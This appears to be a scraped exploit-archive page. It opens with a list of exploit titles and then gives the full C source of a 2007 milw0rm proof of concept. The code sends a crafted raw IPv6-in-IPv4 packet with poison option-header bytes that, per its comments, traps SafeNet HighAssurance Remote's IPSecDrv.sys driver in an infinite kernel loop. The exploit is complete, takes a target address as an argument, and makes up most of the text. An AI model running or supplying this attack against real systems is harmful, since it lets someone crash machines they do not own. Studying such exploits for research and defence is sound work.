477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
129 lines
3.3 KiB
C
Executable file
129 lines
3.3 KiB
C
Executable file
/* safenet-dos.c
|
|
*
|
|
* SafeNet HighAssurance Remote ~1.4.0 Ring0 DoS (win32)
|
|
* by John Anderson <john@ev6.net>
|
|
* mu-b <mu-b@digit-labs.org>
|
|
* - Mar 2006 - June 2007
|
|
*
|
|
* - Tested on: SafeNet HighAssurance Remote 1.4.0 (Build 12) (win32)
|
|
*
|
|
* Kernel level (Ring0) DoS in IPv6 support of IPSecDrv.sys
|
|
* (causes an infinite loop in searching option headers 0x1000BEB0).
|
|
*
|
|
* This POC only works on a local subnet since it sends an invalid packet
|
|
* and any sensible router will drop it. However, this is exploitable
|
|
* remotely with IPv6.
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <unistd.h>
|
|
#include <sys/types.h>
|
|
#include <libnet.h>
|
|
#include <sys/time.h>
|
|
|
|
#define IPV4_HDR_LEN 20
|
|
#define IPV6_HDR_LEN 40
|
|
#define UDP_LEN 16
|
|
|
|
struct opt
|
|
{
|
|
u_char nxt_hdr;
|
|
u_char opt_len;
|
|
};
|
|
|
|
unsigned long int
|
|
lookup (char *hostname)
|
|
{
|
|
struct hostent *name;
|
|
unsigned long int address;
|
|
|
|
if ((address = inet_addr (hostname)) != -1)
|
|
return address;
|
|
if ((name = gethostbyname (hostname)) == NULL)
|
|
return -1;
|
|
|
|
memcpy (&address, name->h_addr, name->h_length);
|
|
return (address);
|
|
}
|
|
|
|
int
|
|
main (int argc, char **argv)
|
|
{
|
|
u_char *buf = NULL;
|
|
|
|
/* libnet vars */
|
|
char errbuf[LIBNET_ERRBUF_SIZE];
|
|
libnet_t *lnsock;
|
|
char *device = NULL;
|
|
|
|
/* packet vars */
|
|
struct ip *ip_hdr = NULL;
|
|
struct opt *opt_hdr = NULL;
|
|
u_int32_t src_ip = 0, dst_ip = 0;
|
|
|
|
printf ("SafeNet HighAssurance Remote ~1.4.0 Ring0 DoS POC\n"
|
|
"by John Anderson <john@ev6.net>\n"
|
|
" mu-b <mu-b@digit-labs.org>\n\n");
|
|
|
|
if (!argv[1])
|
|
{
|
|
printf ("Usage: %s <destination> [source]\n", argv[0]);
|
|
exit (EXIT_FAILURE);
|
|
}
|
|
|
|
/* allocate space for packet */
|
|
if ((buf = malloc (IPV6_HDR_LEN + UDP_LEN)) == NULL)
|
|
{
|
|
perror ("malloc: ");
|
|
exit (EXIT_FAILURE);
|
|
}
|
|
|
|
/* initialise libnet */
|
|
lnsock = libnet_init (LIBNET_RAW4_ADV, device, errbuf);
|
|
if (lnsock == NULL)
|
|
{
|
|
fprintf (stderr, "libnet_init() failed: %s", errbuf);
|
|
exit (-1);
|
|
}
|
|
|
|
if (!argv[2])
|
|
src_ip = lookup ("127.0.0.1");
|
|
else
|
|
src_ip = lookup (argv[2]);
|
|
|
|
dst_ip = lookup (argv[1]);
|
|
|
|
/* Build the pseudo-IPv4 header */
|
|
memset (buf, 0, sizeof buf);
|
|
ip_hdr = (struct ip *) buf;
|
|
ip_hdr->ip_v = 6;
|
|
ip_hdr->ip_hl = 0;
|
|
ip_hdr->ip_tos = 0;
|
|
ip_hdr->ip_len = htons (IPV6_HDR_LEN + UDP_LEN);
|
|
ip_hdr->ip_id = htons (0);
|
|
ip_hdr->ip_off = htons (0);
|
|
ip_hdr->ip_ttl = 0;
|
|
ip_hdr->ip_p = 0;
|
|
ip_hdr->ip_sum = 0;
|
|
ip_hdr->ip_src.s_addr = src_ip;
|
|
ip_hdr->ip_dst.s_addr = dst_ip;
|
|
|
|
/* Build option header with poison bytes */
|
|
opt_hdr = (struct opt *) (buf + IPV6_HDR_LEN);
|
|
opt_hdr->nxt_hdr = 0x3C; /* != 0x3B */
|
|
opt_hdr->opt_len = 0x07; /* length n such that:-
|
|
*(((u_char *)opt_hdr) + n * 2) != 0x3B &&
|
|
*(((u_char *)opt_hdr) + n * 2 + 1) == 0x00 &&
|
|
n * 2 < IPV6_HDR_LEN + UDP_LEN */
|
|
/* a value of 0x00 will suffice!@$%! */
|
|
|
|
printf ("Attacking %s", argv[1]);
|
|
libnet_write_raw_ipv4 (lnsock, buf, IPV6_HDR_LEN + UDP_LEN);
|
|
printf (".\n");
|
|
|
|
return (EXIT_SUCCESS);
|
|
}
|
|
|
|
// milw0rm.com [2007-06-08]
|